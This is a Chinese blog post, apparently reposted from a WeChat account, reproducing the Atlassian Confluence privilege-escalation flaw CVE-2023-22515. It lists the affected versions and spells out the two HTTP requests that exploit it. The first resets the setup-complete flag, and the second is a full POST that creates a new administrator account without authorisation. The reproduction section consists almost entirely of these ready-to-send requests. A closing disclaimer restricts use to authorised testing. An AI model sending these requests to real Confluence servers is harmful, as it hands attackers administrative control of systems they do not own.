[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)

admin 2023年11月5日22:43:07评论80 views字数 1479阅读4分55秒阅读模式

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。


[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
漏洞描述
[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)

攻击者可以利用有访问权限的Confluence Data Center and Server实例漏洞在未授权的情况下创建Confluence管理员用户并以管理员权限进入Confluence后台。


[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
影响版本
[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
8.0.0 <= Confluence Data Center 和 Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center 和 Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center 和 Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center 和 Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center 和 Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center 和 Confluence Server <= 8.5.1


[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
漏洞复现
[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
第一次发包,发包后返回success
/server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false

[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)

第二次发包创建账号

POST /setup/setupadministrator.action HTTP/1.1 Host: 192.168.168.129:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=B3FC576A89A343C219366798C6DA400F Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 95 
username=user&fullName=user&[email protected]&password=user&confirm=user&setup-next-button=Next


这是CVE-2023-22515不是CVE-2023-22518


注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
喜欢就关注我吧,订阅更多最新消息


原文始发于微信公众号(扫地僧的茶饭日常):[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月5日22:43:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)https://cn-sec.com/archives/2177130.html

发表评论

匿名网友 填写信息